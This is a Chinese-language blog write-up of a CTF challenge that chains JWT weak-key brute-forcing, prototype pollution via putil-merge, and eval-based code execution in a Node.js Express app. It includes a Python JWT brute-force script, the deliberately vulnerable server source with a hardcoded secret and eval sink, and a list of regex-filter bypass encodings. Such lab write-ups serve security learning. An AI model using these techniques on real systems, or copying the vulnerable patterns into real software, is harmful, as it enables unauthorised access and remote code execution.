<!DOCTYPE html>
<html>
    <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0 user-scalable=1" name="viewport">
    <title>s4mmy&#39;s blog</title> <!--使用config中的全局变量title作为标题-->
    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="s4mmy's blog" type="application/atom+xml">
</head>
    
    <body>
        <header class="header">
    <div class="title">
        <a href="/" class="logo" >s4mmy&#39;s blog</a>
    </div>
    <nav class="navbar">
        <ul class="menu">
            
                <a href="/" class="menu-item-link">Home</a>   
            
                <a href="/journals/" class="menu-item-link">Journals</a>   
            
                <a href="/technical/" class="menu-item-link">Technical</a>   
            
                <a href="/other/" class="menu-item-link">Other</a>   
            
                <a href="/about/" class="menu-item-link">About</a>   
            
        </ul>
    
    </nav>
    
    
</header>



        
        <div class="container">
            <div style="border-bottom:1px solid #eaedf3;"></div>
            
            <article class="post-content">
    <div class="post-title">
        <h2>一道nodejs污染+jwt爆破的题</h2>
    </div>
    <div>
        <span class="post-time">2023-07-01</span>
    </div>
    <div class="post-font">
        <h2 id="Nodejs命令执行"><a href="#Nodejs命令执行" class="headerlink" title="Nodejs命令执行"></a>Nodejs命令执行</h2><p>又是复现其他师傅博客上的题目的一天~</p>
<p>这题的整体结构还是比较简单的，但是做的过程还是踩了不少的坑。</p>
<p><img src="/../../img/nodejs_image/1.png"></p>
<p>看起来需要获得admin权限</p>
<p>抓个包看一下</p>
<p><img src="/../../img/nodejs_image/2.png"></p>
<p>coockie部分看起来有点像JWT，理由是由三部分加密组成，且由点进行连接。</p>
<p>到jwt.io进行解密</p>
<p><img src="/../../img/nodejs_image/3.png"></p>
<p>尝试将guest改成admin再传入，然而还是不行。</p>
<p>可以推测这里是使用了密钥进行加密，这里对jwt弱密钥进行爆破，编写如下脚本</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">#jwtj加密key值爆破脚本
import jwt
#在这里输入jwt token
jwt_str&#x3D;&#39;&#39;

f&#x3D;open(&#39;keys.txt&#39;)#在这里指定字典文件
for i in f:
    try:
        jwt.decode(jwt_str, verify&#x3D;True, key&#x3D;i, algorithms&#x3D;&#39;HS256&#39;)
        print(&#39;the key is &#39;+i)
        break
    except (jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):
        print(&#39;there are something wrong,but the key is&#39; + i)#数据部分预定义字段错误,但是key是正确的
        break
    except jwt.exceptions.InvalidSignatureError:
        continue
else:
    print(&#39;found no key&#39;)</code></pre>

<p><img src="/../../img/nodejs_image/4.png"></p>
<p>重新进行编码成功进入<code>/source</code>页面，里面是如下源码</p>
<pre class="line-numbers language-Javascript" data-language="Javascript"><code class="language-Javascript">const express &#x3D; require(&quot;express&quot;);
const jwt &#x3D; require(&quot;jsonwebtoken&quot;);
const app &#x3D; express();
const bodyParser &#x3D; require(&quot;body-parser&quot;);
const path &#x3D; require(&quot;path&quot;);
const jwt_secret &#x3D; &quot;toor&quot;;
const cookieParser &#x3D; require(&quot;cookie-parser&quot;);
const putil_merge &#x3D; require(&quot;putil-merge&quot;);
app.use(cookieParser());
app.use(bodyParser.urlencoded(&#123; extended: true &#125;)).use(bodyParser.json());

var Super &#x3D; &#123;&#125;;

var safecode &#x3D; function (code) &#123;
  let validInput &#x3D;
    &#x2F;global|mainModule|constructor|read|write|_load|exec|spawnSync|stdout|eval|stdout|Function|setInterval|setTimeout|var|\+|\*&#x2F;gi;
  return !validInput.test(code);
&#125;;

app.all(&quot;&#x2F;code&quot;, (req, res) &#x3D;&gt; &#123;
  res.type(&quot;html&quot;);
  if (req.method &#x3D;&#x3D; &quot;POST&quot; &amp;&amp; req.body) &#123;
    putil_merge(&#123;&#125;, req.body, &#123; deep: true &#125;);
  &#125;
  res.send(&quot;welcome to code&quot;);
&#125;);

app.get(&quot;&#x2F;source&quot;, (req, res) &#x3D;&gt; &#123;
  res.type(&quot;html&quot;);
  var auth &#x3D; req.cookies.auth;
  jwt.verify(auth, jwt_secret, function (err, decoded) &#123;
    if (decoded.user &#x3D;&#x3D;&#x3D; &quot;admin&quot;) &#123;
      res.sendFile(path.join(__dirname + &quot;&#x2F;app.js&quot;));
    &#125; else &#123;
      res.end(&quot;you are not admin&quot;);
    &#125;
  &#125;);
&#125;);

app.all(&quot;&#x2F;root&quot;, (req, res) &#x3D;&gt; &#123;
  res.type(&quot;html&quot;);
  code &#x3D; req.body.code;
  console.log(req.body.key);
  if (!req.body.key || req.body.key &#x3D;&#x3D;&#x3D; undefined || req.body.key &#x3D;&#x3D;&#x3D; null) &#123;
    res.send(&quot;please input key&quot;);
  &#125; else &#123;
    if (Super[&quot;userid&quot;] &#x3D;&#x3D;&#x3D; &quot;Superadmin&quot; + req.body.key) &#123;
      if (!safecode(code)) &#123;
        res.send(&quot;forbidden!&quot;);
      &#125; else &#123;
        res.send(eval(code));
      &#125;
    &#125; else &#123;
      res.send(&quot;You are not the Super&quot;);
    &#125;
  &#125;
&#125;);

app.get(&quot;&#x2F;&quot;, (req, res) &#x3D;&gt; &#123;
  res.type(&quot;html&quot;);
  var token &#x3D; jwt.sign(&#123; user: &quot;guest&quot; &#125;, jwt_secret, &#123; algorithm: &quot;HS256&quot; &#125;);
  res.cookie(&quot;auth &quot;, token);
  res.end(&quot;Only admin can get source in &#x2F;source&quot;);
&#125;);

app.listen(3000, () &#x3D;&gt; console.log(&quot;Server started on port 3000&quot;));
</code></pre>



<p>在<code>/root</code>路由下有一个eval函数可以执行命令，然而要进入eval函数的判断前提是<code>Super[&quot;userid&quot;] === &quot;Superadmin&quot;+req.body.key</code>和<code>key</code>值不为空</p>
<p>在往上在<code>code</code>路由下有一个<code>putil_merge</code>函数进行merge操作，可以推断这里要使用原型链污染。</p>
<p>这里现在<code>code</code>处污染<code>userid</code>的值，然后再在root下传入<code>key</code>和<code>code</code>的值便可以进行命令执行了。</p>
<p>原先我不知道<code>req.body.key</code> 这个参数可以用POST或者json直接传参赋值，还在想要如何污染才能绕过判断，所以在这里卡了一会。。。</p>
<p>其实在程序最上面那一部分就说明了可以使用json或者POST传参</p>
<pre class="line-numbers language-Javascript" data-language="Javascript"><code class="language-Javascript">app.use(bodyParser.urlencoded(&#123; extended: true &#125;)).use(bodyParser.json());</code></pre>

<p>卡住我的第二个点是我不知道<code>Super[&quot;userid&quot;]</code>其实就相当于<code>Super.userid</code>所以只要污染原型链上的<code>userid</code>就够了，在头几行也定义了说<code>Super</code>是一个空对象。这搞得我也想了一段时间要怎么去污染<code>Super[&quot;userid&quot;]</code>这个参数。。。</p>
<p>还有就是<code>Super[&quot;userid&quot;] === &quot;Superadmin&quot; + req.body.key</code>中的<code>&quot;Superadmin&quot; + req.body.key</code>其实就是简单的字符串拼接，当时也不知道自己是脑袋抽了还是怎么了，想不过来这个要怎么处理。。。</p>
<p>该清楚上面那些原理后，接着可以构造发包了。</p>
<p>首先是code路由下的构造</p>
<p><img src="/../../img/nodejs_image/5.png"></p>
<p>这里需要注意的是需要在请求头中加入<code>Content-type:application/json</code>,我一开始没有注意，把它加到<code>Accept</code>头里去了，整了半天才发下加错地方了。。。。</p>
<p>接着是root路由下的构造</p>
<p><img src="/../../img/nodejs_image/6.png"></p>
<p><code>key</code>值传入<code>zzz</code>与<code>Superadmin</code>拼接通过判断，同时<code>code</code>进行命令执行。</p>
<p>这里使用的是POST直接传参，所以要写成<code>Content-type:application/x-www-form-urlencoded</code></p>
<p>在源码处我们有注意到<code>code</code>其实是进行了正则匹配过滤，可以使用一些常见bypass进行绕过</p>
<pre class="line-numbers language-none"><code class="language-none">16进制编码
unicode编码
加号拼接
模板字符串
concat函数连接
base64编码</code></pre>

<p>在这里我是用的是16进制编码。另外我发现只有进行同步进程创建才可以成功执行命令。</p>
<p>最后在记录一个大坑，今天这个洞其实是个CVE，影响版本从1.0.0 到 3.6.6。而我一开始安装的putil-merge是3.10.10的版本，已经修复了该反序列化漏洞，卡了我一下午。。。。后面才发现是因为版本原因，下次也要多注意一点了。。</p>
<h3 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h3><p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/237032#h2-0">nodejs中代码执行绕过的一些技巧-安全客 - 安全资讯平台 (anquanke.com)</a></p>
<p><a target="_blank" rel="noopener" href="http://47.103.121.189/2022/08/19/node-js%E4%B8%80%E9%81%93%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E8%B8%A9%E5%9D%91%E8%AE%B0/">哈哈，骗你的！ヾ(ﾟ∀ﾟゞ)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/acbb936e87df">https://www.jianshu.com/p/acbb936e87df</a></p>

    </div>
</article>
<!--显示文章页相关内容-->
            <!--body是一个变量，代表页面的主要内容。在渲染模板时，这个变量会被替换为实际的内容。-->
            

            <div style="border-bottom:1px solid #eaedf3;"></div>

            <footer class="footer">
    <p>s4mmy &copy; 2025&nbsp;| &nbsp;Recorded for better expression🧡&nbsp;|
        <a href="https://github.com/s4mmyyy/hexo-theme-life" target="_blank" class="theme">&nbsp;Theme</a>
    
    </p>
</footer>
        </div>
        
    </body>
</html>